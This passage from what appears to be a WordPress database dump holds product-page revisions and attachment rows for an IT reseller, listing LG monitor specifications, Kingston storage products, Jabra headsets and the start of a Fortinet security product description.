13:22:08','',1532,'https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Evolve-75e.png',0,'attachment','image/png',0),(2455,1,'2018-12-18 21:20:58','2018-12-18 13:20:58','','Jabra Evolve 65tÂ ','','inherit','closed','closed','','jabra-evolve-65t','','','2018-12-18 21:20:58','2018-12-18 13:20:58','',1532,'https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Evolve-65t-.png',0,'attachment','image/png',0),(2274,1,'2018-12-17 11:51:29','2018-12-17 03:51:29','<h3><strong>21:9 UltraWide Monitors</strong></h3>\r\nExplore all you have ever wanted in a monitor with LGâ€™s 21:9 Ultrawide. featuring a wider viewing space experience suitable for both work and gaming.\r\n\r\n<img class=\"alignnone wp-image-2260 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29WK600-W (29\" 21:9 UltraWideâ„¢ Full HD IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>29â€ 21:9 WFHD (2560 x 1080) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Design</li>\r\n 	<li>Tilt Adjustable Stand</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class=\"alignnone wp-image-2261 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-1-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n<div class=\"improve-info-key-feature\">\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">38WK95C-W (38\" Class 21:9 UltraWideÂ® WQHD+ IPS Curved LED Monitor (37.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>38\" 21:9 WQHD+ (3840x1600) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>3-Side Borderless Design</li>\r\n 	<li>Tilt / Height Adjustable Stand</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2262 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/34UC98-W_940_01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">34UC98-W (34\" Curved 21:9 UltraWideâ„¢ IPS Display)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>34\" 21:9 Curved WQHD IPS Display</li>\r\n 	<li>sRGB Over 99%</li>\r\n 	<li>Thunderbolt 2.0 (x 2)</li>\r\n 	<li>Screen Split 2.0 (PIP Mode)</li>\r\n 	<li>USB 3.0 Quick Charge</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2263 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM69G-B_20180118_D01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM69G-B (29\" Class 21:9 Ultrawideâ„¢ Full HD IPS Gaming Monitor (29\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 UltraWideâ„¢ Monitors</li>\r\n 	<li>1ms Motion Blur Reduction</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>DAS Mode</li>\r\n 	<li>Black Stabilizer</li>\r\n 	<li>Game Mode</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2264 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM59A-P_D1_110817-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM59A-P (29\" UltraWideâ„¢ IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 Full HD Workstation for Contents Creator</li>\r\n 	<li>IPS Display Professional-Grade Color Capability</li>\r\n 	<li>Versatile &amp; Perform with OnScreen Control 2.0</li>\r\n 	<li>Versatility and Performance with Screen Split</li>\r\n 	<li>Professional-Grade Color With Reader Mode</li>\r\n 	<li>Professional-Grade Color With Flicker Safe</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n[maxbutton id=\"1\" ]\r\n<div class=\"key-feature-list\"><section class=\"improve-info-feature\">\r\n<h3>4K Monitors</h3>\r\n<div class=\"content-head-desc\">Boasting stunning 4K resolution for the finest clarity and detail, LGâ€™s Digital Cinema 4K and UHD 4K monitors offer immersive viewing, natural-looking images, a richer, wider color range, high-quality sound and more.</div>\r\n</section>\r\n<h4></h4>\r\n<div class=\"page-controls\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2265 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27MD5KA-B (27\" UltraFineâ„¢ 5K IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<ul>\r\n 	<li>5K (5120 x 2880) IPS Display</li>\r\n 	<li>218 Pixel Per Inch</li>\r\n 	<li>P3 99% Color Spectrum</li>\r\n 	<li>Thunderboltâ„¢3</li>\r\n 	<li>Built-In Camera &amp; Speaker</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2266 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">32UD59-B</h4>\r\n</div>\r\n<div class=\"info-text-bottom stickynav-m\">\r\n<h4 class=\"improve-info-title\">32\" 16:9 IPS 4K Monitor</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>32â€ UHD 4K (3840x2160) Display</li>\r\n 	<li>DCI-P3 95% / Color Calibrated</li>\r\n 	<li>4K@60Hz, HDCP2.2 Supported HDMIx2 &amp; DisplayPort</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>Height &amp; Tilt Adjustable</li>\r\n 	<li>OnScreen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2267 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UK600-W (27\" Class 4K UHD IPS LED Monitor with HDR 10 (27\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>27 Inch 4K UHD IPS Monitor</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99% Color Gamut</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Display</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2269 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-2-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UD88-W (27â€ 16:9 IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS Monitor</li>\r\n 	<li>sRGB over 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>On-Screen Control with Screen Split 2.0</li>\r\n 	<li>FreeSync</li>\r\n 	<li>Game Mode &amp; Black Stabilizer</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2270 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-3-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UD58-B (27â€ IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>Realistic Gaming Experience</li>\r\n 	<li>Clear, Live Gaming Scenes with FreeSync</li>\r\n 	<li>High-End Gaming Features</li>\r\n 	<li>Optimized Game Settings</li>\r\n 	<li>Edit Perfect Visual</li>\r\n 	<li>User-friendly, Easy On Screen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2271 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-4-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">43UD79-B (43\" Class 4K UHD IPS LED Monitor (42.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS</li>\r\n 	<li>HDCP 2.2 Compatible</li>\r\n 	<li>USB Type Câ„¢</li>\r\n 	<li>4x HDMI Inputs</li>\r\n 	<li>On Screen Control</li>\r\n 	<li>Factory Calibrated</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section>[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section>','LG','','inherit','closed','closed','','1546-revision-v1','','','2018-12-17 11:51:29','2018-12-17 03:51:29','',1546,'https://bintara.com.my/blog/2018/12/17/1546-revision-v1/',0,'revision','',0),(2454,1,'2018-12-18 21:20:08','2018-12-18 13:20:08','','Â Jabra Evolve 75','','inherit','closed','closed','','jabra-evolve-75','','','2018-12-18 21:20:08','2018-12-18 13:20:08','',1532,'https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Evolve-75.png',0,'attachment','image/png',0),(2275,1,'2018-12-17 11:53:12','2018-12-17 03:53:12','<h3><strong>21:9 UltraWide Monitors</strong></h3>\r\nExplore all you have ever wanted in a monitor with LGâ€™s 21:9 Ultrawide. featuring a wider viewing space experience suitable for both work and gaming.\r\n\r\n<img class=\"alignnone wp-image-2260 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29WK600-W (29\" 21:9 UltraWideâ„¢ Full HD IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>29â€ 21:9 WFHD (2560 x 1080) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Design</li>\r\n 	<li>Tilt Adjustable Stand</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class=\"alignnone wp-image-2261 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-1-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n<div class=\"improve-info-key-feature\">\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">38WK95C-W (38\" Class 21:9 UltraWideÂ® WQHD+ IPS Curved LED Monitor (37.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>38\" 21:9 WQHD+ (3840x1600) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>3-Side Borderless Design</li>\r\n 	<li>Tilt / Height Adjustable Stand</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2262 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/34UC98-W_940_01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">34UC98-W (34\" Curved 21:9 UltraWideâ„¢ IPS Display)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>34\" 21:9 Curved WQHD IPS Display</li>\r\n 	<li>sRGB Over 99%</li>\r\n 	<li>Thunderbolt 2.0 (x 2)</li>\r\n 	<li>Screen Split 2.0 (PIP Mode)</li>\r\n 	<li>USB 3.0 Quick Charge</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2263 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM69G-B_20180118_D01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM69G-B (29\" Class 21:9 Ultrawideâ„¢ Full HD IPS Gaming Monitor (29\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 UltraWideâ„¢ Monitors</li>\r\n 	<li>1ms Motion Blur Reduction</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>DAS Mode</li>\r\n 	<li>Black Stabilizer</li>\r\n 	<li>Game Mode</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2264 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM59A-P_D1_110817-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM59A-P (29\" UltraWideâ„¢ IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 Full HD Workstation for Contents Creator</li>\r\n 	<li>IPS Display Professional-Grade Color Capability</li>\r\n 	<li>Versatile &amp; Perform with OnScreen Control 2.0</li>\r\n 	<li>Versatility and Performance with Screen Split</li>\r\n 	<li>Professional-Grade Color With Reader Mode</li>\r\n 	<li>Professional-Grade Color With Flicker Safe</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n[maxbutton id=\"1\" ]\r\n<div class=\"key-feature-list\"><section class=\"improve-info-feature\">\r\n<h3></h3>\r\n<h3>4K Monitors</h3>\r\n<div class=\"content-head-desc\">Boasting stunning 4K resolution for the finest clarity and detail, LGâ€™s Digital Cinema 4K and UHD 4K monitors offer immersive viewing, natural-looking images, a richer, wider color range, high-quality sound and more.</div>\r\n</section>\r\n<h4></h4>\r\n<div class=\"page-controls\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2265 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27MD5KA-B (27\" UltraFineâ„¢ 5K IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<ul>\r\n 	<li>5K (5120 x 2880) IPS Display</li>\r\n 	<li>218 Pixel Per Inch</li>\r\n 	<li>P3 99% Color Spectrum</li>\r\n 	<li>Thunderboltâ„¢3</li>\r\n 	<li>Built-In Camera &amp; Speaker</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2266 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">32UD59-B</h4>\r\n</div>\r\n<div class=\"info-text-bottom stickynav-m\">\r\n<h4 class=\"improve-info-title\">32\" 16:9 IPS 4K Monitor</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>32â€ UHD 4K (3840x2160) Display</li>\r\n 	<li>DCI-P3 95% / Color Calibrated</li>\r\n 	<li>4K@60Hz, HDCP2.2 Supported HDMIx2 &amp; DisplayPort</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>Height &amp; Tilt Adjustable</li>\r\n 	<li>OnScreen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2267 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UK600-W (27\" Class 4K UHD IPS LED Monitor with HDR 10 (27\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>27 Inch 4K UHD IPS Monitor</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99% Color Gamut</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Display</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2269 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-2-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UD88-W (27â€ 16:9 IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS Monitor</li>\r\n 	<li>sRGB over 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>On-Screen Control with Screen Split 2.0</li>\r\n 	<li>FreeSync</li>\r\n 	<li>Game Mode &amp; Black Stabilizer</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2270 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-3-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UD58-B (27â€ IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>Realistic Gaming Experience</li>\r\n 	<li>Clear, Live Gaming Scenes with FreeSync</li>\r\n 	<li>High-End Gaming Features</li>\r\n 	<li>Optimized Game Settings</li>\r\n 	<li>Edit Perfect Visual</li>\r\n 	<li>User-friendly, Easy On Screen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2271 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-4-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">43UD79-B (43\" Class 4K UHD IPS LED Monitor (42.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS</li>\r\n 	<li>HDCP 2.2 Compatible</li>\r\n 	<li>USB Type Câ„¢</li>\r\n 	<li>4x HDMI Inputs</li>\r\n 	<li>On Screen Control</li>\r\n 	<li>Factory Calibrated</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section>[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section>','LG','','inherit','closed','closed','','1546-revision-v1','','','2018-12-17 11:53:12','2018-12-17 03:53:12','',1546,'https://bintara.com.my/blog/2018/12/17/1546-revision-v1/',0,'revision','',0),(2276,1,'2018-12-17 12:18:17','2018-12-17 04:18:17','<h3>Reliable SD cards, SSD drives, memory modules and USB flash drives for consumers, businesses, enterprises and system builders offered by <em>Kingston</em>.</h3>\r\n<h3>Memory</h3>\r\n<h4>Server Memory</h4>\r\nTrust Kingston for all your server memory needs. Our experts know how important it is to keep your business up and running with the ultra-reliable memory that you need and the service to guide you.\r\n<h4>Desktop/Notebook Memory</h4>\r\nQuality components. Rigorous testing. A lifetime warranty. Just three of the many reasons to choose Kingston memory for your desktop or notebook.\r\n\r\n&nbsp;\r\n<h3>Solid-State Drives</h3>\r\n<h4>Consumer</h4>\r\nRevive your computer with improved speed, performance and reliability over traditional hard drives.\r\n<h4>Business</h4>\r\nExtend the lifecycle and dramatically improve the performance of PCs for a lower TCO with SSDNow drives designed for business.\r\n<h4>Enterprise</h4>\r\nThese enterprise SSDs offer increased endurance and power-failure features to keep mission-critical environments up and running 24/7.\r\n<h4>System Builders</h4>\r\nHard drive replacements ideal for non-PC applications\r\n\r\n&nbsp;\r\n<h3>DataTraveler USB Drives</h3>\r\n<h4>Personal Drives</h4>\r\nDataTraveler Flash drives offer capacities up to 2TB and a wide variety of features. Store and transfer photos, music, videos and files with legendary Kingston reliability.\r\n<h4>Encrypted Drives</h4>\r\nDesigned to protect data that requires airtight security, these drives help you meet specific agency directives like TAA and FIPS compliance and are ideal for Government or Corporate use.\r\n\r\n&nbsp;\r\n<h3>Flash Cards</h3>\r\n<h4>Photo/Video (SD Cards)</h4>\r\nFrom everyday use to professional photo or video, these cards deliver exceptional speeds, huge capacities and legendary Kingston reliability.\r\n<h4>Mobile Devices (microSD)</h4>\r\nReliable photo and video storage for phones, tablets, PDAs and more. Available in a full range of sizes and speeds with accessories to suit your needs.\r\n<h4>Card Readers</h4>\r\nKingston Card Readers quickly transfer all your data â€“ photos, videos, music etc.â€“ so you can wait less and do more. They support a wide variety of formats, including microSD, microSDHC, SD, SDHC, SDXC and CompactFlash.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Kingston','','inherit','closed','closed','','1544-autosave-v1','','','2018-12-17 12:18:17','2018-12-17 04:18:17','',1544,'https://bintara.com.my/blog/2018/12/17/1544-autosave-v1/',0,'revision','',0),(2277,1,'2018-12-17 12:17:23','2018-12-17 04:17:23','<h3>Reliable SD cards, SSD drives, memory modules and USB flash drives for consumers, businesses, enterprises and system builders offered by <em>Kingston</em>.</h3>\r\n<h3>Memory</h3>\r\n<h4>Server Memory</h4>\r\nTrust Kingston for all your server memory needs. Our experts know how important it is to keep your business up and running with the ultra-reliable memory that you need and the service to guide you.\r\n<h4>Desktop/Notebook Memory</h4>\r\nQuality components. Rigorous testing. A lifetime warranty. Just three of the many reasons to choose Kingston memory for your desktop or notebook.\r\n\r\n&nbsp;\r\n<h3>Solid-State Drives</h3>\r\n<h4>Consumer</h4>\r\nRevive your computer with improved speed, performance and reliability over traditional hard drives.\r\n<h4>\r\nBusiness</h4>\r\nExtend the lifecycle and dramatically improve the performance of PCs for a lower TCO with SSDNow drives designed for business.\r\n<h4>\r\nEnterprise</h4>\r\nThese enterprise SSDs offer increased endurance and power-failure features to keep mission-critical environments up and running 24/7.\r\n<h4>System Builders</h4>\r\nHard drive replacements ideal for non-PC applications\r\n\r\n&nbsp;\r\n<h3>DataTraveler USB Drives</h3>\r\n<h4>Personal Drives</h4>\r\nDataTraveler Flash drives offer capacities up to 2TB and a wide variety of features. Store and transfer photos, music, videos and files with legendary Kingston reliability.\r\n<h4>\r\nEncrypted Drives</h4>\r\nDesigned to protect data that requires airtight security, these drives help you meet specific agency directives like TAA and FIPS compliance and are ideal for Government or Corporate use.\r\n\r\n&nbsp;\r\n<h3>Flash Cards</h3>\r\n<h4>Photo/Video (SD Cards)</h4>\r\nFrom everyday use to professional photo or video, these cards deliver exceptional speeds, huge capacities and legendary Kingston reliability.\r\n<h4>\r\nMobile Devices (microSD)</h4>\r\nReliable photo and video storage for phones, tablets, PDAs and more. Available in a full range of sizes and speeds with accessories to suit your needs.\r\n<h4>\r\nCard Readers</h4>\r\nKingston Card Readers quickly transfer all your data â€“ photos, videos, music etc.â€“ so you can wait less and do more. They support a wide variety of formats, including microSD, microSDHC, SD, SDHC, SDXC and CompactFlash.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Kingston','','inherit','closed','closed','','1544-revision-v1','','','2018-12-17 12:17:23','2018-12-17 04:17:23','',1544,'https://bintara.com.my/blog/2018/12/17/1544-revision-v1/',0,'revision','',0),(2279,1,'2018-12-17 12:23:25','2018-12-17 04:23:25','Fortinet provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n<h3>NETWORK SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Next Generation Firewall (NGFW)</strong></li>\r\n</ol>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>High-performance threat protection</strong>Industry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.</li>\r\n 	<li><strong>Validated security effectiveness</strong>Independently 